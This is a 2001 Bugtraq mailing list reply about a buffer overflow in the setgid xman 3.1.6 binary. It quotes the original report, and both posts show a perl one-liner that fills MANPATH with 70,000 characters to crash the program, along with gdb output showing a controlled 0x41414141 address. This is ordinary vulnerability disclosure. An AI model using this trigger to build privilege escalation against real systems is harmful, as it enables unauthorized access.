Bugtraq mailing list archives
Re: suid xman 3.1.6 overflows
From: Matias Sedalo <s0t4ipv6 () shellcode com ar>
Date: Mon, 16 Jul 2001 03:16:11 -0400 (ART)
The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0 but...\ s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'` s0t4ipv6@gohan:~$ xman Xman Error: No manual pages found. s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'` s0t4ipv6@gohan:~$ xman Segmentation fault s0t4ipv6@gohan:~$ uname -a Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown ================================================================ Matias Sedalo.______________________http://www.shellcode.com.ar/ On Wed, 11 Jul 2001, KF wrote:
xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow srtxg () chanae alphanet ch is noted as the packager of this RPM. I do not know the author. [root@linux lib]# ls -al `which xman` -rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman* [root@linux lib]# xman [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'` [root@linux lib]# xman Xman Error: Could not allocate memory for manual sections. [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'` [root@linux lib]# xman Segmentation fault [root@linux lib]# gdb xman GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 (gdb) run Starting program: /usr/X11R6/bin/xman 0x4022fb66 in getenv () from /lib/libc.so.6 (gdb) bt #0 0x4022fb66 in getenv () from /lib/libc.so.6 #1 0x0804bc47 in _start () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141 (gdb) info registers eax 0xbffee784 -1073813628 ecx 0x804fb29 134544169 edx 0x805414c 134562124 ebx 0x40328f2c 1077055276 esp 0xbffec6fc 0xbffec6fc ebp 0xbffec714 0xbffec714 esi 0x6 6 edi 0x41414141 1094795585 eip 0x4022fb66 0x4022fb66 -KF
Current thread:
- suid xman 3.1.6 overflows KF (Jul 15)
- Re: suid xman 3.1.6 overflows Matias Sedalo (Jul 16)